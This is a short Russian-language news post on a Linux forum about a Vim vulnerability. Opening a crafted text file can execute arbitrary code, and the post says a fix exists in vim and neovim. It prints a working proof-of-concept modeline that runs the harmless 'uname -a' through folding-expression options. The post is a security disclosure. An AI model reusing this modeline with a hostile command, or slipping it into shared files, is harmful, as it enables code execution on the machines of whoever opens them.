LINUX.ORG.RU

Vim


183

1

Всего сообщений: 963

См. также:

 , , , , , , , ,

Уязвимость в vim

Группа Безопасность

Опубликована уязвимость в текстовом редакторе vim, позволяющая исполнить произвольный код при открытии редактором текстового файла.

Вот текст файла выполняющего безобидный uname -a

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Исправление в виде добавленного вызова check_secure() уже доступно в репозиториях vim и neovim.

>>> Очень хорошее описание механизма уязвимости

 ,

voronaam ()

Еще новости

Ноябрь 2018

Июнь 2018

2018

2017

2016

2015

  • Vifm 0.8 (36 комментариев)

2014

2013

2012

Опросы

Галерея

Форум

Вчера

Июнь 2019

Май 2019

Апрель 2019

Март 2019

Февраль 2019